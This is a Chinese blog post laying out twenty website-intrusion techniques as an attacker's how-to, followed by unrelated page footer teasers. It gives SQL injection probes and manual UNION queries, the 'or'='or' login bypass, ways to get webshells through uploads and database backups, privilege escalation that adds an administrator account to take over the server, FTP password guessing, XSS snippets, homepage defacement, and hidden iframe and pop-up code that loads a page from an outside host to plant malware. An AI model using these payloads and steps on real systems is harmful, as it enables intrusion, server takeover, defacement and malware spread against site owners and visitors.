网站入侵思路之渗透篇

1,〓经典注入〓

    通常,判断一个网站是否存在注入点,可以用’,and 1=1 ,and 1=2,+and+1=1,+and+1=2,%20and%201=1

,%20and%201=2,来判断,

如果and 1=1正常返回页面,1=2错误,或者找不到,那么就存在注入点

    2,〓万能密码OR漏洞〓

    万能密码'or'='or',可以用在后台管理输入,有的网站由于没有过滤OR漏洞,输入OR直接就可以突破,一般漏洞

存在于ASP类型的网站

  3,〓爆库〓

  爆库,可以理解为爆出数据库下载,用爆库之类的工具可以直接就获得管理员用户和密码,%5C为十六进制的

\符号,而数据库大于5.0

就可以进行爆库,如在PHP手工高级注入时,用VERSION()这个变量猜出网站数据库版本,如果一个网站数据

库大于5.0,且是ACESS

数据库,那么提交地址是:http://www.520jsj.com/rpc/show24.asp?id=127,我们直接把%5C加到RPC后面,因为

%5C是爆二级目录,所以

应该是这样,http://www.520jsj.com/rpc%5c/show24.asp?id=127,而%23是代表#,如果管理员为了防止他人非

法下载数据库,而把数据

库改成#database.mdb,这样防止了,如果页面地址为http://www.xx.com/rpd/#database.mdb,是这样的,那么我

们把%23加到替换#

,http://www.xx.com/rpd/%23database.mdb

4,〓COOKIE中转,SQL防注入程序,提醒你IP已被记录〓

COOKIE中转,SQL防注入,如果检测一个网站时,弹出这样一个对话框,上面出现SQL防注入程序提醒的字

语,那么我们可以利用

COOKIE中转,注入中转来突破,方法是先搭建一个ASP环境(且网站为ASP网站),然后打开中转工具,记

住一个网站的页面地址

粘贴进工具里,值是多少就写多少,生成,把生成的文件放到目录里,接下来,打开网页,输入http://127.0.

0.1端口)/目录里文

件,如果正常,那么输入http://127.0.0.1:端口/值(目录文件)?提交值,那么拿到工具里猜表名,列名了

5, 〓手工〓

ASP手工语句  表名 and exists (select * from 表名)

                            列名 and (select count(列名) from 表名)>0

                            长度 and (select top 1 len(username) from admin)>0

                              内容 and (select top 1 asc(mid(username,1,1)) from admin)>100

PHP手工语句:order by(猜字段),and 1=2 union select (字段数)and 1=2 union selsect from(位置)

如果有30个字段,那么就应该在注入地址后输入http://www.520jsj.com/showfo.jsp?id=130 and 1=2 union

select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28.29,30

几个常用变量 ,USER(),VERSION()<数据库版本),database()<数据库名称>

6,〓抓包拿WEBSHELL〓

如果进入后台发现,点数据库备份的时候发现找不到,可以通过抓包来获得上传,拿到WEBSHELL,工具

WOSCK抓包,一张图片

,一个ASP马,自行搭建一个上传地址,UPLOAD加载,UPFILE上传,COOKIS=( )

7,〓数据库备份拿WEBSHELL和一句话木马入侵〓

通常进入后台了,发现有数据库备份,拿WEBSHELL吧,找一个添加产品的地方,传一个大马,格式为

JPG图片,然后把图片地址

粘贴到数据库备份那里,给起个名字,如SHELL.ASP,然后合地址访问的时候就进入webshell了,一句话

木马入侵,先编辑记事本,

加入一句话,改为2.jpg,然后备份,访问,发现500内部服务器错误,证明一句话成功,接下来用一句话

木马客户端连接,得到路径

页面,然后改下马名,输入大马内容,提交,得到WEBSHELL

8,〓DB权限差异备份拿WEBSHELL〓

如果一个网站注入点是MYSQL数据库,且是DB权限,或者是SA权限,能够列目录,那么就好办了,找

到网站的目录,目录通常在

D和E盘,备份个小马,合地址访问看看成功没,直接备份大马貌似不行,成功后,再输入大马内容,拿

到WEBSHELL

9,〓找后台〓

找后台,一般默认为admin,admin/admin.asp,admin/login.asp,.admin_login.asp,manage/login.asp

,login.asp,logon,user.asp,

admin/index.asp,当然,这只是默认,一些大网站不可能还用admin作为后台,有的隐藏很深,可以简单

用site:网站 inurl:后台

来猜,或者下载源HTML文件分析找出后台,或者用各种工具来扫描了,方法很多的

10,〓脚本提示〓

有的网站要求进入后台会出现一个脚本提示,就像VB编程里INPUTBOX “”,一个对话输入框,我们输入

administrator突破,

admin代表以管理员身份来进入

11,〓php后门和EWEBEDITOR编辑器入侵〓

PHP后门,如之前爆出的DISZ漏洞,在一个PHP网站后面加C.PHP,如果出现1,那么传个PHP马就拿到

WEBSHELL,

EWEBEDITOR编辑器入侵,是很快速的方式,设置好上传文件类型,传ASA,或者其他的格式,然后

访问拿到WEBSHELL

,如没有直接加语句拿到WEBSHELL

12,〓上传漏洞〓

有的网站虽然没有注入点,但存在一个上传漏洞,那么我们如何来利用了,首先,打开上传地址看是

否存在,如果有,试想传一个ASP大马是不行的,那么传一句话看看,先看能成功不,用明小子来上传,动网,

动力,动感,乔客4种方式,页面地址格式要对应,如果一个网站地址弹出对话框,显示上传成功,那么证明可以拿到

WEBSHELL,传马,另外有的没有任何显示,直接空的,那么可以构建两个上传,第一个传JPG的图片,第二个传ASP

马(大马),记住,大马后面要有个空格才行,如果一个网站地址出现文件类型不正确,请重新上传,那么证明%90可

以拿到WEBSHELL,只是格式不对,不允许,改后缀,只要是网站没有过滤的格式,如果一个网站地址显示请登陆再

上传,那么证明没有拿到COOKIS,思路是在该网站注册一个用户,得到COOKIS,然后上传就成功了

13,〓简单提权拿下服务器和SERV提权和pcanywhere三方提权〓

简单拿下服务器,也就是拿下网站IP主机,首先我们需要一个WEBSHELL,然后看看组件信息,

看看路径可读可以写不,如果有一个可以,那么来到CMD命令下,首先输入可写的文件内容,执行命令加一个

帐号和最高管理权限,然后输入netstat -an,得到主机连接端口,然后用3389连接进入,让其成为肉鸡(最好),这

样比较隐蔽我们操作

14,〓反查入侵和旁注和社会工程学〓

反查IP入侵,也就是入侵21,端口,首先我们入侵网站先PING WWW.520jsj.com ,出IP,然后到反

查IP站点查挂了多少个域名,接下来,添加webmaster@地址,加入字典,(里面多收集可能的口令,如123,

321,456),然后用流光探测密码,登陆ftp://ip,输入用户和密码,改掉信息等等,社会工程学X-WAY,来得到FTP

密码,也需要收集,并不是每个都行,总之是自己的经验

15,〓跨站脚本攻击〓

跨站(CSS),被动攻击,现在需要更多的思路和经验了

三段经典跨站代码

<script>alert("跨站开始")</script>

<script>alert("document.cookie")</script>

<script>window.open(http://www.baidu.com)</script>

16〓特殊空格〓

利用TAB制作的特殊空格,然后注册时输入空格,加管理名字,随便在网站上找个斑竹,或者管理

的名字,这样来注册,有时自己注册的这个也会变成管理员

17,〓改主页〓

改主页,拿到WEBSHELL后,先找出首页文件,一般为index.asp,index.php.index.jsp,index.html,

然后来到站点根目录,编辑index.asp(首页),清空,最好备份,输入自己的主页代码(黑页),保存,再访

问时已经变成自己想要的结果了

18,〓挂马〓

首先在WEBSHELL里,建立一个文本,改为1.htm,接下来在主页最下面挂

两段经典挂马代码

<html>

<iframe src="http://www.x520jsj.com/2.htm" width="0" height="0" frameborder="0"></iframe>

</html>

<SCRIPT language=javascript>       

window.open("http://www.520jsj.com/2.htm","","toolbar=no,location=no,directories=no,status=

no,menubar=no,scrollbars=no,width=1,height=1"); 

</script>

19 〓 GOOGLE BACK语句〓(很多)

inurl:asp?id=    ,inurl:show.asp ,inurl:went.asp ,inurl:jsp?id=,inurl:php?id=

20,〓自寻漏洞〓

自己根据自己的技术经验和积累

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 204,530评论 6 478
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 86,403评论 2 381
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 151,120评论 0 337
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,770评论 1 277
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,758评论 5 367
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,649评论 1 281
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 38,021评论 3 398
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,675评论 0 258
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 40,931评论 1 299
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,659评论 2 321
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,751评论 1 330
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,410评论 4 321
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 39,004评论 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,969评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,203评论 1 260
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 45,042评论 2 350
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,493评论 2 343

推荐阅读更多精彩内容

  • 黑客在入侵企业网站时,通常要通过各种方式获取webshell从而获得企业网站的控制权,然后方便进行之后的入侵行为。...
    查无此人asdasd阅读 3,681评论 0 3
  • 1、到Google搜索,site:cq.cn inurl:asp 2、到Google,搜索一些关键字,edit.a...
    Safesonic阅读 9,601评论 5 8
  • 都说女儿是老爸上辈子的情人,还真不假!看着神经乃爸对甜馨精心的呵护,看着冠军老爸对奥莉严厉的教育,看着豪气吴尊对N...
    _辰希悦阅读 314评论 0 1
  • 我听着一个人的情歌 脸上笑着很落寞 带着虚伪的做作 远处的那个角落 你和他们笑着很快乐 面前的纸上划满 不知所谓的...
    不忍风尘阅读 413评论 0 0
  • 先展示查询的效果: (1)几何图形空间查询: (2)Buffer空间查询: (3)查询函数 PostGIS空间查询...
    宥_Hugh阅读 5,536评论 7 2